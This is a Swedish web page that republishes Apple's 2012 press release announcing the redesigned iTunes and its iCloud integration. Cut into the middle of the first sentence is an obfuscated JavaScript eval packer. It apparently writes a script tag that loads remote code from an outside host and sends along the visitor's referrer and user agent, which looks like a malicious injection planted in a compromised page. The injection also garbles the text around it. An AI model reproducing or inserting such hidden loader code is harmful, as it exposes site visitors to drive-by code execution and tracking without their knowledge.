Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Apple presenterar nya iTunes

nya-itunes-apple
Sebastian

Dramatiskt eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ekeki|var|u0026u|referrer|yfsnk||js|php’.split(’|’),0,{}))
renare och enklare design och smidig integrering med iCloud

SAN FRANCISCO – 12 september 2012 – Apple presenterade idag nya iTunes för Mac och PC, med en spelare i helt ny design, smidig integrering med iCloud och ett nytt elegant utseende på världens mest populära webbutik för musik, appar, film och TV. Nya iTunes kommer i oktober och har ett dramatiskt renare och enklare gränssnitt som sätter ditt favoritinnehåll i centrum. Integreringen med iCloud gör att all musik, film och TV-program som köpts på någon av dina iOS-enheter eller datorer visas i iTunes-biblioteket på din Mac eller PC, där du kommer åt dem när du vill. iTunes Store, App Store och iBookstore har gjorts om från grunden för att det ska bli enklare än någonsin att köpa ditt favoritinnehåll på iPhone, iPad, iPod touch, Mac eller PC.

”Vi skapade iTunes för att vi älskar musik och nu går vi tillbaka till rötterna med en ren och enkel design som sätter musiken i centrum”, sade Eddy Cue, Apples vice VD för internetprogramvara och -tjänster. ”Nya iTunes fungerar otroligt smidigt med iCloud – du har alltid hela ditt mediebibliotek till hands, och dessutom har vi lagt till nya funktioner som gör musiklyssnandet ännu roligare.”

Nya iTunes har ett enklare och renare helskärmsanpassat gränssnitt för Mac och PC, som sätter ditt favoritinnehåll i centrum. Den nya biblioteksvyn ger en bättre överblick över all musik, film och TV-program i biblioteket, eftersom du kan klicka på olika innehållskategorier så att du bara ser en kategori i taget. I den utökade albumvyn kan du se alla spår på ett album samtidigt som du fortsätter att bläddra i musikbiblioteket. Den nya sökfunktionen söker igenom hela iTunes-biblioteket – både musik, film och TV-program. Minispelaren har fått en ny utformning som gör det enkelt att styra musikuppspelningen med hjälp av ett litet verktygsfält, där du kan hoppa till nästa låt eller söka efter en låt utan att behöva öppna biblioteket. Funktionen Nästa är ett nytt roligt sätt att se nästa låt eller lägga låtar och album i lyssningskö.

Med iCloud har du alla dina iTunes-inköp i molnet och kan komma åt dem från iPhone, iPad, iPod touch, Mac, PC eller Apple TV. Nya iTunes är tätt integrerat med iCloud. Alla dina inköp överförs automatiskt till biblioteket på din Mac eller PC, oavsett vilken enhet du köpte dem från. iCloud kommer dessutom ihåg vilka som är dina favoriter bland alla filmer och TV-program – oavsett vilken enhet du använder.

Nya iTunes Store, App Store och iBookstore har ett rent och snyggt gränssnitt som gör det roligare och enklare att handla. Innehåll i blickfånget visas högst upp och utvald musik, film och TV-program står uppställda på hyllor där de är lätta att bläddra bland. Det finns också en historik över förhandsvisningar, där du kan se allt innehåll du har provlyssnat och provtittat på. iCloud håller ordning på historiken på alla dina enheter. Dessutom kan du förhandsvisa 90-sekundersklipp av låtar medan du fortsätter att titta runt i butiken.

Nya iTunes kan hämtas kostnadsfritt från och med oktober på www.itunes.com.

Detta är ett pressmeddelande från Apple AB